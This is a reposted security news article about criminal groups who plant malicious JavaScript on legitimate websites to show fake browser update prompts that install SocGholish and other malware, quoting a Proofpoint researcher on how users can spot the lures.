Watch Out: Attackers Are Hiding Malware in Browser Updates

  /     /     /  
Publicated : 23/11/2024   Category : security


Watch Out: Attackers Are Hiding Malware in Browser Updates


Updating your browser when prompted is a good practice, just make sure the notification comes from the vendor themselves.



Threat actors are using cybersecurity best practices against you, hiding malware inside of fake browser updates.
They do so by seeding legitimate but vulnerable websites with malicious JavaScript. Upon loading, the code presents users with convincing browser update notifications, masking dangerous payloads.
According to
a Oct. 17 report from Proofpoint
, the trend began with
one threat actor, TA569
, and it has since been adopted by at least four different threat clusters, in what appears to be a growing and intractable new trend.
TA569 has been very active for quite some time, and Ive seen how difficult it has been for customers to understand and remediate the threat on their own, says Daniel Blackford, senior manager of threat research at Proofpoint. Because its so effective, he adds, other threat actors have absolutely piggybacked on it.
Though they may vary in the particulars, each of the four threat clusters tracked by Proofpoint follow largely the same script.
First, the actors take advantage of a legitimate but vulnerable website, injecting their own malicious JavaScript code.
Its generally very opportunistic. We have seen it across basically every industry: media, local sports associations — like kids soccer groups — software companies, in some cases, Blackford says.
It might be an unpatched vulnerability, or a WordPress misconfiguration that provides the opening, but it doesnt always have to be the website itself. It can be any assets that are imported into the website — any type of styling template, media player, or pretty much any third-party code, he says.
When an end user loads the website, the attackers script runs alongside the rest of the sites various assets. Its job is to refer traffic to an attacker-controlled domain.
From here, Blackford explains, the Web inject is going to take some information about your system — youre coming from this geographic location, youre using this browser version. It can determine whether youre in some type of virtual environment or not. And if you pass all of the criteria, then its going to reach out to that backend server and pull in the fake Update page.
The update lures are designed to look like theyre coming from the browsers developers, with a clean look and relevant iconography. The following screenshots,
courtesy of the security researcher Jerome Segura
, capture fake updates from TA569 and another cluster, FakeSG, also known as RogueRaticate (see below).
If a user falls for the trap and clicks Update, they download malware to their computer.
If the attacker is TA569, for example, a user will download its signature SocGholish initial access malware. In the past, SocGholish has been used as a primer for
ransomware, including WastedLocker
, LockBit, Drydex, Hive, and more.
Employees and otherwise educated civilians are taught to avoid links and attachments in unrecognized emails or text messages. They might know to avoid a seedy-looking link, but what about a notification coming from their browser?
To suss out a real update from a fake one, Blackford urges users to pay attention to how their trusted websites and browsers typically behave, and whether anything happens that doesnt align with the usual pattern.
Nine times out of 10, Ill go to my kids soccer league website and see: okay, weve got a match against some other school on Wednesday, and nothing happens. And then one time, all of a sudden, Im redirected to a page that says Im using an old version of Chrome, click this button to update. That difference in pattern should be the trigger, he says, while admitting that its not easy to spot. But thats also why bad guys continue to make money hand over fist.
In the end, users shouldnt be spooked from maintaining their cybersecurity hygiene. Updating your browser is a good security practice, Blackford maintains, and I strongly suggest that people do it.

Last News

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security

▸ Travel agency fined £150,000 for breaking Data Protection Act. ◂
Discovered: 23/12/2024
Category: security

▸ 7 arrested, 3 more charged in StubHub cyber fraud ring. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Watch Out: Attackers Are Hiding Malware in Browser Updates